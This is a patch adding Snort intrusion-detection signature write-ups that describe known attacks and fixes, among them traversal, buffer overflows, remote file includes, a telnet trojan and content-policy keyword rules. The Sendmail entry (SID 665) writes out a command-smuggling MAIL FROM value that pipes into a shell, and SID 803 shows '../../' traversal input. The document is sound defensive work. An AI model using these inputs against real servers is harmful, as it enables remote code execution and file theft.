+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
--- /dev/null
+++ b/doc/signatures/1305.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1305
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2287.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2287
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/562.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+562
+
+--
+Summary:
+This event is generated when a known response to a sucessful attack is
+detected.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when a known response to a sucessful attack is
+detected. Some applications do not perform stringent checks when validating
+the credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can be
+compromised and trust relationships between the victim server and other
+hosts can be exploited by the attacker.
+
+Events generated by rules in attack-responses.rules may indicate that an
+attack against a host has been sucessful.
+
+--
+Affected Systems:
+	Any vulnerable host.
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. An attacker might also exploit a
+weakness in a particular application or piece of software that will
+present the opportunity to gain access to the host.
+
+--
+Ease of Attack:
+Simple. Many exploits exist for various systems and software.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Care should be taken to investigate the source of the event. Check for
+signs of system compromise in log files. Check for listening services on
+high ports.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+OpenNap Specification
+http://opennap.sourceforge.net/napster.txt
+
+--
--- /dev/null
+++ b/doc/signatures/1797.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1797
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "BDSM".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "BDSM".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/2737.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2737
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_nchar
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1318.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1318
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "hardcore rape".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "hardcore rape".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/2595.txt
@@ -0,0 +1,68 @@
+Rule:
+
+
+--
+Sid:
+2595
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Mail Transfer Agent Exim.
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code on a vulnerable
+server with the privilege of the process running Exim.
+
+--
+Detailed Information:
+Exim is vulnerable to a buffer overflow, permitting an attacker to execute
+arbitrary code.  The vulnerability may be exploited if Exim is configured to
+verify header syntax in the e-mail message body.  This is not the default
+configuration.  If an attacker supplies a large number of spaces after certain
+header fields, it may be possible to cause a buffer overflow.
+
+--
+Affected Systems:
+Exim prior to version 4.34
+
+--
+Attack Scenarios:
+An attacker can create and send mail with a malformed header,
+possibly causing a buffer overflow and permitting the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/10291
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0400
+
+Other:
+http://www.guninski.com/exim1.html
+
+--
--- /dev/null
+++ b/doc/signatures/817.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+817
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1932.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1932
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1895.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 1895
+
+--
+Summary:
+This event is generated when an attempt is made to exploit 
+vulnerable versions of the Kerberos version 4 administration daemon 
+(kadmind).
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code or gain unauthorized access to the target host along with other hosts in the kerberos realm.
+
+--
+Detailed Information:
+kadmind is used to administer a Kerberos database on the master key distribution center (KDC) of a kerberos realm.
+
+A buffer overflow condition exists in kadmind4 such that when the daemon parses a length value in an administration request the attacker can gain the ability to execute arbitrary code with the privileges of the user running the daemon, usually root.
+
+Authentication is not required to cause the overflow.
+
+Affected Systems:
+	Multiple vendors using kadmind version 4
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-29.html
+http://www.kb.cert.org/vuls/id/875073
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1235
+
+--
--- /dev/null
+++ b/doc/signatures/343.txt
@@ -0,0 +1,60 @@
+SID:
+343
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attack attempt is made against an ftp 
+server possibly running a vulnerable ftpd running on FreeBSD
+--
+
+Impact:
+Possible remote execution of commands on the affected server as the root user
+--
+
+Detailed Information:
+The Washington University ftp daemon (wu-ftpd) does not perform proper 
+checking in its SITE EXEC implementation, and allows user input to be 
+sent directly to printf. This allows an attacker to overwrite data and 
+eventually execute code on the server.
+
+--
+
+Affected Systems:
+Any system running wu-ftpd 2.6 .0 or below
+--
+
+Attack Scenarios:
+A remote attacker will attempt to execute commands on the ftp server 
+with root user privileges, over writing or modifying system files. This 
+can be done with anonymous and real user logins.
+--
+
+Ease of Attack:
+Simple, Exploits exist
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Upgrade to latest version which has fixes for this problem. Maybe even get rid of wu-ftp with something more secure
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/1116.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1116
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/211.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+211
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "r00t".
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/665.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+665
+
+--
+Summary:
+This event is generated when a remote user attempts to exploit a Sendmail vulnerability where a remote user can execute arbitrary code on an server running older versions of Sendmail. 
+
+--
+Impact:
+Severe. Remote execution of arbitrary code, leading to remote root compromise. 
+
+--
+Detailed Information:
+Earlier versions of Sendmail contain a vulnerability in message header parsing. This vulnerability can be exploited by a remote user who sends an email message with a malformed MAIL FROM value to a vulnerable Sendmail implementation. The server then executes any arbitrary shell code included in the text of the email. 
+
+--
+Affected Systems:
+Systems running Sendmail versions lower than 8.6.10.
+
+--
+Attack Scenarios:
+An attacker sends an email using |usr/bin/tail|usr/bin/sh as the MAIL FROM value. Arbitrary shell code placed in the text of the email message is executed by the mail server with the security context of Sendmail.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to Sendmail version 8.6.10 or higher.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0203
+
+Bugtraq
+http://www.securityfocus.com/bid/2308
+
+CERT
+http://www.cert.org/advisories/CA-1995-08.html
+
+--
--- /dev/null
+++ b/doc/signatures/803.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+803
+
+--
+Summary:
+This event is generated when an attempt is made to access hsx.cgi and 
+then utilize a directory traversal technique to read files outside the 
+root directory of the web server. This indicates an attempt to exploit a
+vulnerability in the Hyperseek 2000 search engine that allows 
+read-access to directory listings and files.
+
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a directory traversal vulnerability in HyperSeek 2000. When directory traversal techniques such as ../../ are used as arguments to hsx.cgi, an unauthorized user can navigate to directories and access files that are normally hidden. 
+
+--
+Affected Systems:
+Web servers running iWeb Systems HyperSeek 2000 are vulnerable. 
+
+--
+Attack Scenarios:
+An attacker can use a directory traversal technique when executing hsx.cgi to view hidden directories and files on the web server.
+
+--
+Ease of Attack:
+Simple. Exploits exist. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Uprade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original rule writer unknown
+Rule modified by Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/2314
+
+CERT/CC
+http://www.kb.cert.org/vuls/id/146704
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0253
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10602
+
+--
--- /dev/null
+++ b/doc/signatures/2311.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2311
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft Windows Workstation service.
+
+--
+Impact:
+Serious. Denial of Service (DoS), execution of arbitrary code is
+possible.
+
+--
+Detailed Information:
+Due to insufficient bounds checking in the Microsoft Windows Workstation
+service, it may be possible for an attacker to overwrite portions of
+memory. This can result in the attacker being presented with the
+opportunity to execute code of their choosing. Under some circumstances
+a Denial of Service condition may be possible against the target host.
+
+Specifically, the DCE/RPC service allows for overly long strings to be
+sent to the Workstation logging function. This logging function does not
+check parameters sufficiently which results in the buffer overflow
+condition.
+
+--
+Affected Systems:
+	Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
+	Microsoft Windows XP, Microsoft Windows XP Service Pack 1
+	Microsoft Windows XP 64-Bit Edition
+
+--
+Attack Scenarios:
+The attacker may use one of the available exploits to target a
+vulnerable host.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-28.html
+http://www.kb.cert.org/vuls/id/567620
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-049.asp
+
+--
--- /dev/null
+++ b/doc/signatures/100000749.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000749
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Plume CMS" application running on a webserver. Access to the file "search.php" using a remote file being passed as the "_PX_config[manager_path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "_PX_config[manager_path]" parameter in the "search.php" script used by the "Plume CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Plume CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1634.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1634
+
+--
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Artisoft XtraMail v1.11 mailserver.
+
+--
+Impact:
+When succesfully exploited, the remote attacker can crash the POP3
+service and possibly execute arbitrary code on the mailserver.
+
+--
+Detailed Information:
+The PASS argument, used to submit authentication credentials to the 
+POP3 server XtraMail 1.11, has an exploitable buffer overflow condition 
+If a password of more than 1500 characters is submitted, the
+service will crash.  This error may be exploitable further, and could 
+then allow the attacker to execute arbitrary code on the remote system, 
+under the LocalSystem account.
+
+--
+Affected Systems:
+	All POP3 servers running Artisoft Xtramail 1.11 on Windows.
+
+--
+Attack Scenarios:
+An attacker could crash the POP server, thereby denying
+legitimate users access to their e-mail.  Skilled attackers could
+compromise the mailserver and obtain all incoming e-mail data.
+
+--
+Ease of Attack:
+The DoS attack is trivial to execute, as only a password
+longer than 1500 characters needs to be submitted.  Compromise of the
+mailserver requires more skill, but exploits are available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade XtraMail to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Maarten Van Horenbeeck (maarten@daemon.be)
+--
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10325
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1511
+
+Bugtraq
+http://www.securityfocus.com/bid/791
+
+--
--- /dev/null
+++ b/doc/signatures/100000602.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000602
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_overdue.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "inv_overdue.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2793.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2793
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure purge_statistics
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/856.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+856
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2086.txt
@@ -0,0 +1,85 @@
+Rule:
+
+--
+Sid:
+2086
+
+--
+Summary:
+parse_xml.cgi script on a webserver via the quicktime streaming port.
+
+--
+Impact:
+Arbitrary code execution, information disclosure and possible cross site
+scripting.
+
+--
